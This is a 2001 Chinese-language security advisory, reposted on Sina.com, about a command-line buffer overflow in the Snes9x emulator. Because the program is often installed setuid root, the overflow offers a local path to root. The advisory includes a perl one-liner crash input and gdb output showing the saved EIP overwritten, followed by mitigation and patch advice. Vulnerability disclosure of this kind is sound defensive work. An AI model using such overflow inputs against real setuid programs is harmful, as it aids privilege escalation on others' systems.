首页 新闻 搜索 短信 分类 聊天 导航
新浪首页 > 文化教育 > 网络安全 > 正文

snes9x命令行参数缓冲区溢出漏洞
http://www.sina.com.cn 2001/10/26 16:08  王府培训

  发布日期: 2001-10-16

  更新日期: 2001-10-17

  受影响的系统: Snes9x v1.37以前版本不受影响系统: Snes9x v1.39

  描述:

  snes9x是一个任天堂的仿真器软件,它存在一个缓冲区溢出漏洞。如果提交一个超长的命令行参数(rom名字)给snex9x,将会触发一个缓冲区溢出漏洞。

  由于在多数系统中snes9x安装时都被设置了setuid root属性,以便访问/dev/mem文件。因此,本地攻击者可能利用这个漏洞来获取root权限。

  <*来源:Niels Heinen (zilli0n@gmx.net) 链接:http://archives.neohapsis.com/archives/bugtraq/2001-10/0107.html*>

  测试程序:

  警告

  以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

  Niels Heinen (zilli0n@gmx.net)提供了下列测试代码:

  如果提交一个超过4089字节长的参数给snes9x,就可能覆盖保存的EIP:



bash-2.05/snes9x `perl -e 'print "A" x 85;print "B" x 4004;'`
Rate: 22050, Buffer size: 2048, 16-bit: yes, Stereo: yes, Encoded: no
Segmentation fault (core dumped)
bash-2.05 -core=snes9x.core
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `snes9x'.
Program terminated with signal 11, Segmentation fault.
#0 0x42424141 in ?? ()
(gdb) info all
eax 0x0 0
ecx 0x282e3401 674116609
edx 0x1 1
ebx 0xbfbfab7c -1077957764
esp 0xbfbfab4c 0xbfbfab4c
ebp 0xbfbfab7a 0xbfbfab7a
esi 0xbfbfcb7c -1077949572
edi 0xbfbfbb7c -1077953668
eip 0x42424141 0x42424141 ( == BBAA)
eflags 0x10282 66178
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
(gdb)

  建议:

  临时解决办法:

  如果您无法立刻升级,您可以暂时去掉snes9x的suid root属性: # chmod a-s snes9x

  厂商补丁:

  厂商已经开发了新版本以解决这个问题,您可以在厂商主页下载最新版本:www.snes9x.com


   手机铃声下载 快乐多多 快来搜索好歌!
      新浪企业广场诚征全国代理


发表评论】 【读书沙龙】 【短信推荐】 【关闭窗口

 相关链接
Linux kernel 深层链接拒绝服务漏洞 (2001/10/26 16:00)
Novell Groupwise 泄露任意文件漏洞 (2001/10/26 16:03)
Trend Micro OfficeScan & Virus Buster 配置文件泄露漏洞 (2001/10/26 16:05)
PostNuke 未授权的用户登陆漏洞 (2001/10/26 16:11)
Oracle9iAS Web Cache 多种拒绝服务和缓冲区溢出漏洞 (2001/10/26 15:54)

新 闻 查 询



分 类 信 息
北京
  • 北大燕园MBA辅导
  • 工程师一年速成
  • 结婚不必东奔西走
  • 北外托福雅思班
    济南
  • 出国留学报名在即
  • 成功摇篮山东联大
    上海
  • 朝日文化商务培训
  • 海滨城市——厦门
    广东
  • 0.38元国际长途
    河南
  • 轻大教育文化交流
    天津
  • 精益求精暖通空调
    • 分类信息刊登热线>>



    文化教育意见反馈留言板电话:010-62630930-5178 欢迎批评指正

    网站简介 | 用户注册 | 广告服务 | 招聘信息 | 中文阅读 | Richwin | 联系方式 | 帮助信息

    Copyright © 1996 - 2001 SINA.com, Stone Rich Sight. All Rights Reserved

    版权所有 四通利方 新浪网

    本网站由北京信息港提供网络支持